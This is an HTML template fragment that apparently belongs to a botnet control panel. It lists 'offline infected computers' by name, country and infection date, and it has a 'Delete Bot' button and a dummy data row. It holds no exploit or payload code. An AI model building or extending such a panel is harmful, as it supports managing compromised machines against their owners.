{% extends 'dashboard.html' %}

<!--Only stuff in blocks show-->

<div class="row">
	<div class="col-md-12">
		<div class="card">
			<div class="card-header" data-background-color="purple">
				<h4 class="title">{% block bots_table_name %}Offline Bots{% endblock bots_table_name %}</h4>
				<p class="category">{% block bots_table_description %}List of all offline infected computers{% endblock bots_table_description %}</p>
			</div>
			<!--Dummy Table-->
			<div class="card-content table-responsive">
				<table class="table">
					<thead class="text-primary">
						<th>Name</th>
						<th>Country</th>
						<th>Infection Date</th>
					</thead>
					<tbody>
						<tr>
							<td>Dakota Rice</td>
							<td>Niger</td>
							<td>15, Jul 2015</td>
							{% block last_column_value %}
								<td><button class="btn btn-danger">Delete Bot</button></td>
							{% endblock last_column_value %}
						</tr>
					</tbody>
				</table>

			</div>
		</div>
	</div>
</div>
